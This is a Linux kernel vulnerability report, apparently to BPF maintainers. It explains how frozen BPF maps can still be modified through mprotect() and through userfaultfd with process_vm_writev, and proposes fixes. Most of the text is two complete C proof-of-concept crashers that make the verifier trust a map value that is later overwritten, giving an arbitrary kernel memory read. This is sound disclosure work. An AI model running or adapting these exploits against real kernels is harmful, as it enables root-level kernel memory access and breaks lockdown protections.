Hi! I saw that BPF allows root to create frozen maps, for which the verifier then assumes that they contain constant values. However, map freezing is pretty wobbly: 1. The syscalls for updating maps from userspace don't seem to lock the map at all. 2. BPF doesn't account for the fact that mprotect() can be used to arbitrarily flip VM_WRITE on and off as long as VM_MAYWRITE is set. (crasher attached as bpf-constant-data-mprotect.c) 3. It is assumed that a memory mapping can't be used to write to a page anymore after the mapping has been removed; but actually, userspace can grab references to pages in a VMA and use those references to write to the VMA's pages after the VMA has already been closed. (crasher attached as bpf-constant-data-uffd.c, compile with "gcc -pthread ...") These things are probably not _huge_ concerns for most usecases, since you need to be root to hit this stuff anyway - but I think it'd be desirable for BPF to actually be memory-safe (and the kernel lockdown folks would probably appreciate not having such a glaring hole that lets root read/write arbitrary memory). The third point is particularly hard to solve without adding more constraints on the userspace API; I think that tightening up map freezing would require ensuring that the map has *never* been mapped as writable. Is there a reason why the verifier doesn't replace loads from frozen maps with the values stored in those maps? That seems like it would be not only easier to secure, but additionally more performant.
#define _GNU_SOURCE #include <pthread.h> #include <err.h> #include <errno.h> #include <sched.h> #include <stdio.h> #include <unistd.h> #include <linux/bpf.h> #include <linux/filter.h> #include <linux/prctl.h> #include <linux/userfaultfd.h> #include <sys/ioctl.h> #include <sys/syscall.h> #include <sys/mman.h> #include <stdint.h> #include <sys/socket.h> #include <string.h> #include <poll.h> #include <sys/uio.h> #include <fcntl.h> #define GPLv2 "GPL v2" #define ARRSIZE(x) (sizeof(x) / sizeof((x)[0])) /* registers */ /* caller-saved: r0..r5 */ #define BPF_REG_ARG1 BPF_REG_1 #define BPF_REG_ARG2 BPF_REG_2 #define BPF_REG_ARG3 BPF_REG_3 #define BPF_REG_ARG4 BPF_REG_4 #define BPF_REG_ARG5 BPF_REG_5 #define BPF_REG_CTX BPF_REG_6 #define BPF_REG_FP BPF_REG_10 #define BPF_LD_IMM64_RAW(DST, SRC, IMM) \ ((struct bpf_insn) { \ .code = BPF_LD | BPF_DW | BPF_IMM, \ .dst_reg = DST, \ .src_reg = SRC, \ .off = 0, \ .imm = (__u32) (IMM) }), \ ((struct bpf_insn) { \ .code = 0, /* zero is reserved opcode */ \ .dst_reg = 0, \ .src_reg = 0, \ .off = 0, \ .imm = ((__u64) (IMM)) >> 32 }) #define BPF_LD_MAP_FD(DST, MAP_FD) \ BPF_LD_IMM64_RAW(DST, BPF_PSEUDO_MAP_FD, MAP_FD) #define BPF_LDX_MEM(SIZE, DST, SRC, OFF) \ ((struct bpf_insn) { \ .code = BPF_LDX | BPF_SIZE(SIZE) | BPF_MEM,\ .dst_reg = DST, \ .src_reg = SRC, \ .off = OFF, \ .imm = 0 }) #define BPF_MOV64_REG(DST, SRC) \ ((struct bpf_insn) { \ .code = BPF_ALU64 | BPF_MOV | BPF_X, \ .dst_reg = DST, \ .src_reg = SRC, \ .off = 0, \ .imm = 0 }) #define BPF_ALU64_IMM(OP, DST, IMM) \ ((struct bpf_insn) { \ .code = BPF_ALU64 | BPF_OP(OP) | BPF_K, \ .dst_reg = DST, \ .src_reg = 0, \ .off = 0, \ .imm = IMM }) #define BPF_ALU32_IMM(OP, DST, IMM) \ ((struct bpf_insn) { \ .code = BPF_ALU | BPF_OP(OP) | BPF_K, \ .dst_reg = DST, \ .src_reg = 0, \ .off = 0, \ .imm = IMM }) #define BPF_STX_MEM(SIZE, DST, SRC, OFF) \ ((struct bpf_insn) { \ .code = BPF_STX | BPF_SIZE(SIZE) | BPF_MEM,\ .dst_reg = DST, \ .src_reg = SRC, \ .off = OFF, \ .imm = 0 }) #define BPF_ST_MEM(SIZE, DST, OFF, IMM) \ ((struct bpf_insn) { \ .code = BPF_ST | BPF_SIZE(SIZE) | BPF_MEM, \ .dst_reg = DST, \ .src_reg = 0, \ .off = OFF, \ .imm = IMM }) #define BPF_EMIT_CALL(FUNC) \ ((struct bpf_insn) { \ .code = BPF_JMP | BPF_CALL, \ .dst_reg = 0, \ .src_reg = 0, \ .off = 0, \ .imm = (FUNC) }) #define BPF_JMP_IMM(OP, DST, IMM, OFF) \ ((struct bpf_insn) { \ .code = BPF_JMP | BPF_OP(OP) | BPF_K, \ .dst_reg = DST, \ .src_reg = 0, \ .off = OFF, \ .imm = IMM }) #define BPF_EXIT_INSN() \ ((struct bpf_insn) { \ .code = BPF_JMP | BPF_EXIT, \ .dst_reg = 0, \ .src_reg = 0, \ .off = 0, \ .imm = 0 }) #define BPF_LD_ABS(SIZE, IMM) \ ((struct bpf_insn) { \ .code = BPF_LD | BPF_SIZE(SIZE) | BPF_ABS, \ .dst_reg = 0, \ .src_reg = 0, \ .off = 0, \ .imm = IMM }) #define BPF_ALU64_REG(OP, DST, SRC) \ ((struct bpf_insn) { \ .code = BPF_ALU64 | BPF_OP(OP) | BPF_X, \ .dst_reg = DST, \ .src_reg = SRC, \ .off = 0, \ .imm = 0 }) #define BPF_MOV64_IMM(DST, IMM) \ ((struct bpf_insn) { \ .code = BPF_ALU64 | BPF_MOV | BPF_K, \ .dst_reg = DST, \ .src_reg = 0, \ .off = 0, \ .imm = IMM }) int bpf_(int cmd, union bpf_attr *attrs) { return syscall(__NR_bpf, cmd, attrs, sizeof(*attrs)); } int array_create(int value_size, int num_entries, unsigned int flags) { union bpf_attr create_map_attrs = { .map_type = BPF_MAP_TYPE_ARRAY, .key_size = 4, .value_size = value_size, .max_entries = num_entries, .map_flags = flags, }; int mapfd = bpf_(BPF_MAP_CREATE, &create_map_attrs); if (mapfd == -1) err(1, "map create"); return mapfd; } void map_freeze(int fd) { union bpf_attr attr = {.map_fd = fd}; if (bpf_(BPF_MAP_FREEZE, &attr)) err(1, "freeze map"); } int prog_load(struct bpf_insn *insns, size_t insns_count) { char verifier_log[100000]; union bpf_attr create_prog_attrs = { .prog_type = BPF_PROG_TYPE_SOCKET_FILTER, .insn_cnt = insns_count, .insns = (uint64_t)insns, .license = (uint64_t)GPLv2, .log_level = 2, .log_size = sizeof(verifier_log), .log_buf = (uint64_t)verifier_log }; int progfd = bpf_(BPF_PROG_LOAD, &create_prog_attrs); int errno_ = errno; printf("==========================\n%s==========================\n", verifier_log); errno = errno_; if (progfd == -1) err(1, "prog load"); return progfd; } int create_filtered_socket_fd(struct bpf_insn *insns, size_t insns_count) { int progfd = prog_load(insns, insns_count); // hook eBPF program up to a socket // sendmsg() to the socket will trigger the filter // returning 0 in the filter should toss the packet int socks[2]; if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) err(1, "socketpair"); if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(int))) err(1, "setsockopt"); return socks[1]; } void trigger_proc(int sockfd) { if (write(sockfd, "X", 1) != 1) err(1, "write to proc socket failed"); } static unsigned long *uffd_mapping; static unsigned long *mapping; static void *thread_fn(void *dummy) { struct iovec local_iov = { .iov_base = uffd_mapping, .iov_len = 8 }; struct iovec remote_iov = { .iov_base = mapping, .iov_len = 8 }; if (process_vm_writev(getpid(), &local_iov, 1, &remote_iov, 1, 0) != 8) err(1, "process_vm_writev"); return NULL; } int main(void) { int small_map = array_create(8, 1, BPF_F_RDONLY_PROG|BPF_F_MMAPABLE); /* map the small_map */ mapping = mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, small_map, 0); /* set up a userfaultfd region as uffd_mapping */ int uffd = syscall(__NR_userfaultfd, 0); if (uffd == -1) err(1, "userfaultfd"); struct uffdio_api api = { .api = 0xAA }; if (ioctl(uffd, UFFDIO_API, &api)) err(1, "uffd api"); uffd_mapping = mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0); if (uffd_mapping == MAP_FAILED) err(1, "mmap anon"); struct uffdio_register reg = { .range = { .start = (unsigned long)uffd_mapping, .len = 0x1000 }, .mode = UFFDIO_REGISTER_MODE_MISSING }; if (ioctl(uffd, UFFDIO_REGISTER, ®)) err(1, "uffd register"); /* start a thread that will take a reference to the BPF map's page, * then stall on the userfaultfd */ pthread_t thread; if (pthread_create(&thread, NULL, thread_fn, NULL)) err(1, "pthread_create"); sleep(1); /* unmap the small_map; the other thread will still be holding a reference to the page in it */ munmap(mapping, 0x1000); /* freeze the map */ map_freeze(small_map); /* load a program while the map still contains zeroes */ struct bpf_insn insns[] = { // r0 = &map[0] BPF_LD_MAP_FD(BPF_REG_ARG1, small_map), BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP), BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -4), BPF_ST_MEM(BPF_W, BPF_REG_ARG2, 0, 0), BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem), BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1), BPF_EXIT_INSN(), // r1 = map[0] BPF_LDX_MEM(BPF_DW, BPF_REG_1, BPF_REG_0, 0), // r2 = *(&map[0] + map[0]) BPF_ALU64_REG(BPF_ADD, BPF_REG_0, BPF_REG_1), BPF_LDX_MEM(BPF_DW, BPF_REG_2, BPF_REG_0, 0), BPF_MOV64_IMM(BPF_REG_0, 0), BPF_EXIT_INSN() }; int sock_fd = create_filtered_socket_fd(insns, ARRSIZE(insns)); /* unblock the other thread, which will then overwrite the map contents */ unsigned long buf[0x1000/8] = { 0xdeae000000000000 }; struct uffdio_copy copy = { .dst = (unsigned long)uffd_mapping, .src = (unsigned long)buf, .len = 0x1000 }; if (ioctl(uffd, UFFDIO_COPY, ©)) err(1, "uffd copy"); if (pthread_join(thread, NULL)) err(1, "pthread_join"); /* run the program with bogus data */ trigger_proc(sock_fd); }
#define _GNU_SOURCE #include <pthread.h> #include <err.h> #include <errno.h> #include <sched.h> #include <stdio.h> #include <unistd.h> #include <linux/bpf.h> #include <linux/filter.h> #include <linux/prctl.h> #include <linux/userfaultfd.h> #include <sys/ioctl.h> #include <sys/syscall.h> #include <sys/mman.h> #include <stdint.h> #include <sys/socket.h> #include <string.h> #include <poll.h> #include <sys/uio.h> #include <fcntl.h> #define GPLv2 "GPL v2" #define ARRSIZE(x) (sizeof(x) / sizeof((x)[0])) /* registers */ /* caller-saved: r0..r5 */ #define BPF_REG_ARG1 BPF_REG_1 #define BPF_REG_ARG2 BPF_REG_2 #define BPF_REG_ARG3 BPF_REG_3 #define BPF_REG_ARG4 BPF_REG_4 #define BPF_REG_ARG5 BPF_REG_5 #define BPF_REG_CTX BPF_REG_6 #define BPF_REG_FP BPF_REG_10 #define BPF_LD_IMM64_RAW(DST, SRC, IMM) \ ((struct bpf_insn) { \ .code = BPF_LD | BPF_DW | BPF_IMM, \ .dst_reg = DST, \ .src_reg = SRC, \ .off = 0, \ .imm = (__u32) (IMM) }), \ ((struct bpf_insn) { \ .code = 0, /* zero is reserved opcode */ \ .dst_reg = 0, \ .src_reg = 0, \ .off = 0, \ .imm = ((__u64) (IMM)) >> 32 }) #define BPF_LD_MAP_FD(DST, MAP_FD) \ BPF_LD_IMM64_RAW(DST, BPF_PSEUDO_MAP_FD, MAP_FD) #define BPF_LDX_MEM(SIZE, DST, SRC, OFF) \ ((struct bpf_insn) { \ .code = BPF_LDX | BPF_SIZE(SIZE) | BPF_MEM,\ .dst_reg = DST, \ .src_reg = SRC, \ .off = OFF, \ .imm = 0 }) #define BPF_MOV64_REG(DST, SRC) \ ((struct bpf_insn) { \ .code = BPF_ALU64 | BPF_MOV | BPF_X, \ .dst_reg = DST, \ .src_reg = SRC, \ .off = 0, \ .imm = 0 }) #define BPF_ALU64_IMM(OP, DST, IMM) \ ((struct bpf_insn) { \ .code = BPF_ALU64 | BPF_OP(OP) | BPF_K, \ .dst_reg = DST, \ .src_reg = 0, \ .off = 0, \ .imm = IMM }) #define BPF_ALU32_IMM(OP, DST, IMM) \ ((struct bpf_insn) { \ .code = BPF_ALU | BPF_OP(OP) | BPF_K, \ .dst_reg = DST, \ .src_reg = 0, \ .off = 0, \ .imm = IMM }) #define BPF_STX_MEM(SIZE, DST, SRC, OFF) \ ((struct bpf_insn) { \ .code = BPF_STX | BPF_SIZE(SIZE) | BPF_MEM,\ .dst_reg = DST, \ .src_reg = SRC, \ .off = OFF, \ .imm = 0 }) #define BPF_ST_MEM(SIZE, DST, OFF, IMM) \ ((struct bpf_insn) { \ .code = BPF_ST | BPF_SIZE(SIZE) | BPF_MEM, \ .dst_reg = DST, \ .src_reg = 0, \ .off = OFF, \ .imm = IMM }) #define BPF_EMIT_CALL(FUNC) \ ((struct bpf_insn) { \ .code = BPF_JMP | BPF_CALL, \ .dst_reg = 0, \ .src_reg = 0, \ .off = 0, \ .imm = (FUNC) }) #define BPF_JMP_IMM(OP, DST, IMM, OFF) \ ((struct bpf_insn) { \ .code = BPF_JMP | BPF_OP(OP) | BPF_K, \ .dst_reg = DST, \ .src_reg = 0, \ .off = OFF, \ .imm = IMM }) #define BPF_EXIT_INSN() \ ((struct bpf_insn) { \ .code = BPF_JMP | BPF_EXIT, \ .dst_reg = 0, \ .src_reg = 0, \ .off = 0, \ .imm = 0 }) #define BPF_LD_ABS(SIZE, IMM) \ ((struct bpf_insn) { \ .code = BPF_LD | BPF_SIZE(SIZE) | BPF_ABS, \ .dst_reg = 0, \ .src_reg = 0, \ .off = 0, \ .imm = IMM }) #define BPF_ALU64_REG(OP, DST, SRC) \ ((struct bpf_insn) { \ .code = BPF_ALU64 | BPF_OP(OP) | BPF_X, \ .dst_reg = DST, \ .src_reg = SRC, \ .off = 0, \ .imm = 0 }) #define BPF_MOV64_IMM(DST, IMM) \ ((struct bpf_insn) { \ .code = BPF_ALU64 | BPF_MOV | BPF_K, \ .dst_reg = DST, \ .src_reg = 0, \ .off = 0, \ .imm = IMM }) int bpf_(int cmd, union bpf_attr *attrs) { return syscall(__NR_bpf, cmd, attrs, sizeof(*attrs)); } int array_create(int value_size, int num_entries, unsigned int flags) { union bpf_attr create_map_attrs = { .map_type = BPF_MAP_TYPE_ARRAY, .key_size = 4, .value_size = value_size, .max_entries = num_entries, .map_flags = flags, }; int mapfd = bpf_(BPF_MAP_CREATE, &create_map_attrs); if (mapfd == -1) err(1, "map create"); return mapfd; } void map_freeze(int fd) { union bpf_attr attr = {.map_fd = fd}; if (bpf_(BPF_MAP_FREEZE, &attr)) err(1, "freeze map"); } int prog_load(struct bpf_insn *insns, size_t insns_count) { char verifier_log[100000]; union bpf_attr create_prog_attrs = { .prog_type = BPF_PROG_TYPE_SOCKET_FILTER, .insn_cnt = insns_count, .insns = (uint64_t)insns, .license = (uint64_t)GPLv2, .log_level = 2, .log_size = sizeof(verifier_log), .log_buf = (uint64_t)verifier_log }; int progfd = bpf_(BPF_PROG_LOAD, &create_prog_attrs); int errno_ = errno; printf("==========================\n%s==========================\n", verifier_log); errno = errno_; if (progfd == -1) err(1, "prog load"); return progfd; } int create_filtered_socket_fd(struct bpf_insn *insns, size_t insns_count) { int progfd = prog_load(insns, insns_count); // hook eBPF program up to a socket // sendmsg() to the socket will trigger the filter // returning 0 in the filter should toss the packet int socks[2]; if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) err(1, "socketpair"); if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(int))) err(1, "setsockopt"); return socks[1]; } void trigger_proc(int sockfd) { if (write(sockfd, "X", 1) != 1) err(1, "write to proc socket failed"); } int main(void) { int small_map = array_create(8, 1, BPF_F_RDONLY_PROG|BPF_F_MMAPABLE); map_freeze(small_map); struct bpf_insn insns[] = { // r0 = &map[0] BPF_LD_MAP_FD(BPF_REG_ARG1, small_map), BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP), BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -4), BPF_ST_MEM(BPF_W, BPF_REG_ARG2, 0, 0), BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem), BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1), BPF_EXIT_INSN(), // r1 = map[0] BPF_LDX_MEM(BPF_DW, BPF_REG_1, BPF_REG_0, 0), // r2 = *(&map[0] + map[0]) BPF_ALU64_REG(BPF_ADD, BPF_REG_0, BPF_REG_1), BPF_LDX_MEM(BPF_DW, BPF_REG_2, BPF_REG_0, 0), BPF_MOV64_IMM(BPF_REG_0, 0), BPF_EXIT_INSN() }; int sock_fd = create_filtered_socket_fd(insns, ARRSIZE(insns)); unsigned long *mapping = mmap(NULL, 0x1000, PROT_READ, MAP_SHARED, small_map, 0); if (mapping == MAP_FAILED) err(1, "mmap"); if (mprotect(mapping, 0x1000, PROT_READ|PROT_WRITE)) err(1, "mprotect"); *mapping = 0xdeae000000000000; trigger_proc(sock_fd); }